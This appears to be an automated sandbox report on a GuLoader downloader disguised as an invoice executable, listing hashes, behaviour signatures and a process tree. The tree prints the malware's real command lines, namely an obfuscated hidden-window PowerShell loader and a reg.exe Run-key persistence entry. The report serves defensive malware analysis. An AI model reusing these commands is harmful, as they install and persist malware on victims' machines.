Analysis
- max time kernel: 121s
- max time network: 130s
- platform: windows7_x64
- resource: win7-20240508-en
- resource tags: arch:x64, arch:x86, image:win7-20240508-en, locale:en-us, os:windows7-x64, system
- submitted: 22-05-2024 18:11

Static task: static1

Behavioral task: behavioral1
- Sample: Colep Packaging Polska (602447) - invoice 342000749.exe
- Resource: win7-20240508-en

Behavioral task: behavioral2
- Sample: Colep Packaging Polska (602447) - invoice 342000749.exe
- Resource: win10v2004-20240508-en

Behavioral task: behavioral3
- Sample: Stningsstrukturers.ps1
- Resource: win7-20240215-en

Behavioral task: behavioral4
- Sample: Stningsstrukturers.ps1
- Resource: win10v2004-20240426-en
General
- Target: Colep Packaging Polska (602447) - invoice 342000749.exe
- Size: 427KB
- MD5: 2ceb634eba1c56c9dcf5daa8c78ebc92
- SHA1: 8c101631d550b07502f5e077b33d4142d6323a5d
- SHA256: 74e64ac4e30e760332d456eb22f9c287a378653566cf4eac6278c4576c2d5cf9
- SHA512: 042d3249ae6863ff90caae3001258e80a3e92f9abc8dbfb1ac0eb48dfcef7c72686a677a70c554a2a620680319aba93058d22c71b306252530f51cb874131caa
- SSDEEP: 6144:W9X0GVlmkDWa5rfgmIOVXAk85ltRn8j7r85ugCDo4pr3WWPC1LiJ1Km9:Y02FCa5M2m5LRnKg5D4pr3WrMJ1Km9
Malware Config

Signatures
- Guloader, Cloudeye
  A shellcode-based downloader first seen in 2020.

- Command and Scripting Interpreter: PowerShell (1 TTPs, 1 IoCs)
  Runs PowerShell with a hidden display window.

- Adds Run key to start application (2 TTPs, 1 IoCs)
  Processes: reg.exe
  description     | ioc                                                                                                                                                                                                                                                          | process
  Set value (str) | \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Windows\CurrentVersion\Run\Claybank = "%Sergius% -windowstyle minimized $metensomatosis=(Get-ItemProperty -Path 'HKCU:\\Marveller\\').Scaldic;%Sergius% ($metensomatosis)" | reg.exe

- Suspicious use of NtCreateThreadExHideFromDebugger (2 IoCs)
  Processes: wab.exe
  pid  | process
  2412 | wab.exe
  2412 | wab.exe

- Suspicious use of NtSetInformationThreadHideFromDebugger (2 IoCs)
  Processes: powershell.exe, wab.exe
  pid  | process
  2992 | powershell.exe
  2412 | wab.exe

- Suspicious use of SetThreadContext (1 IoCs)
  Processes: powershell.exe
  description                           | pid  | process        | target process
  PID 2992 set thread context of 2412   | 2992 | powershell.exe | wab.exe

- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).

- Modifies registry key (1 TTPs, 1 IoCs)

- Suspicious behavior: EnumeratesProcesses (6 IoCs)
  Processes: powershell.exe
  pid  | process
  2992 | powershell.exe (6 entries)

- Suspicious behavior: MapViewOfSection (1 IoCs)
  Processes: powershell.exe
  pid  | process
  2992 | powershell.exe

- Suspicious use of AdjustPrivilegeToken (1 IoCs)
  Processes: powershell.exe
  description             | pid  | process
  Token: SeDebugPrivilege | 2992 | powershell.exe

- Suspicious use of WriteProcessMemory (22 IoCs)
  Processes: Colep Packaging Polska (602447) - invoice 342000749.exe, powershell.exe, wab.exe, cmd.exe
  description                    | pid  | process                                                  | target process
  PID 2040 wrote to memory of 2992 | 2040 | Colep Packaging Polska (602447) - invoice 342000749.exe | powershell.exe (4 entries)
  PID 2992 wrote to memory of 2792 | 2992 | powershell.exe                                           | cmd.exe (4 entries)
  PID 2992 wrote to memory of 2412 | 2992 | powershell.exe                                           | wab.exe (6 entries)
  PID 2412 wrote to memory of 2244 | 2412 | wab.exe                                                  | cmd.exe (4 entries)
  PID 2244 wrote to memory of 2536 | 2244 | cmd.exe                                                  | reg.exe (4 entries)
Processes
- C:\Users\Admin\AppData\Local\Temp\Colep Packaging Polska (602447) - invoice 342000749.exe (PID 2040)
  Command line: "C:\Users\Admin\AppData\Local\Temp\Colep Packaging Polska (602447) - invoice 342000749.exe"
  - Suspicious use of WriteProcessMemory
  - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 2992)
    Command line: "powershell.exe" -windowstyle hidden "$Undertrykt=Get-Content 'C:\Users\Admin\AppData\Local\Temp\rumfangsformlers\mettemaries\Stningsstrukturers.Rec';$Sludrehoved=$Undertrykt.SubString(60222,3);.$Sludrehoved($Undertrykt)"
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    - C:\Windows\SysWOW64\cmd.exe (PID 2792)
      Command line: "C:\Windows\system32\cmd.exe" /c "set /A 1^^0"
    - C:\Program Files (x86)\windows mail\wab.exe (PID 2412)
      Command line: "C:\Program Files (x86)\windows mail\wab.exe"
      - Suspicious use of NtCreateThreadExHideFromDebugger
      - Suspicious use of NtSetInformationThreadHideFromDebugger
      - Suspicious use of WriteProcessMemory
      - C:\Windows\SysWOW64\cmd.exe (PID 2244)
        Command line: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Claybank" /t REG_EXPAND_SZ /d "%Sergius% -windowstyle minimized $metensomatosis=(Get-ItemProperty -Path 'HKCU:\Marveller\').Scaldic;%Sergius% ($metensomatosis)"
        - Suspicious use of WriteProcessMemory
        - C:\Windows\SysWOW64\reg.exe (PID 2536)
          Command line: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Claybank" /t REG_EXPAND_SZ /d "%Sergius% -windowstyle minimized $metensomatosis=(Get-ItemProperty -Path 'HKCU:\Marveller\').Scaldic;%Sergius% ($metensomatosis)"
          - Adds Run key to start application
          - Modifies registry key
Network
MITRE ATT&CK Enterprise v15
Downloads
- C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
  Filesize: 344B